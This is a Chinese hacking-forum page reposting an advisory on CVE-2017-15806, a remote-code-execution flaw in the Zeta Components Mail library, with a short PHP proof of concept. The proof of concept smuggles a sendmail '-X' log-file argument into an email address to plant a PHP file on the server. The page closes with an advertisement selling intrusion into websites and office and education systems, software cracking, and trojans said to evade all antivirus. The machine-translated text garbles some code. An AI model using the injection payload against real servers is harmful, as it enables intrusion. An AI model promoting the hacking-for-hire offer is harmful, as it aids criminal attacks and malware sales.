malwarebenchmark再爆0day漏洞:CVE-2017-15806

责声明">
制造商:Zeta Components 模块:邮件,<=1.8.1 类型:远程执行代码漏洞 发布时间:2017/11/12 作者:凯 CVE-2017-15806 概观 Zeta Components是一个基于PHP 5实现的高质量,通用的应用程序...
制造商:Zeta Components 模块:邮件,<=1.8.1 类型:远程执行代码漏洞 发布时间:2017/11/12 作者:凯 CVE-2017-15806 概观 Zeta Components是一个基于PHP 5实现的高质量,通用的应用程序开发库。该项目于2010年5月加入了Apache Incubator,但出于某种原因于2012年4月离开了Apache Software Foundation。我们在Mail库中发现了一个RCE(远程执行代码)漏洞,可以在服务器上实现任意代码。 详情 该漏洞位于ezcMailMtaTransport类的send函数中。 在/src/transports/mta/mta_transport.php的第73行中,send()函数调用PHP mail()来发送消息。通常,PHP将使用sendmail作为默认MTA。调用mail()函数时它的第五个参数是$ additionalParameters,它允许将其他参数传递给sendmail。在Mail中,分配$ additionalParameters的代码如下: $ additionalParameters=' - f {$ mail-> returnPath-> email}“; 如果攻击者的传入电子邮件地址是这样的: 'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php' 然后将有效负载放在消息体内,sendmail会将日志写入/var/www/html/cache/exploit.php(传递-Xlogfile到sendmail会将日志写入logfile)。这会导致文件在消息正文中包含有效负载,并且可以通过远程访问#domain#/cache/exploit.php来执行有效负载。 通常,漏洞利用需要满足以下三个条件: 使用ezcMailMtaTransport 使用sendmail作为MTA ezcMailAddress未正确转义。 PoC使用Mailmail; $ mail=new ezcMail(); $ mail-> returnPath=new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'); $ MAIL-> addTo(new ezcMailAddress('some one')); $ mail-> subject='Mail PoC Exploit'; $ mail-> body=new ezcMailText('<php phpinfo();>'); $ transport=new ezcMailMtaTransport(); $ transport->发($邮件); 制造商已发布补丁并建议将Mail升级到1.8.2 黑客业务列表介绍和一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。
  • 发表于 2017-11-18 08:00
  • 阅读 ( 1666 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章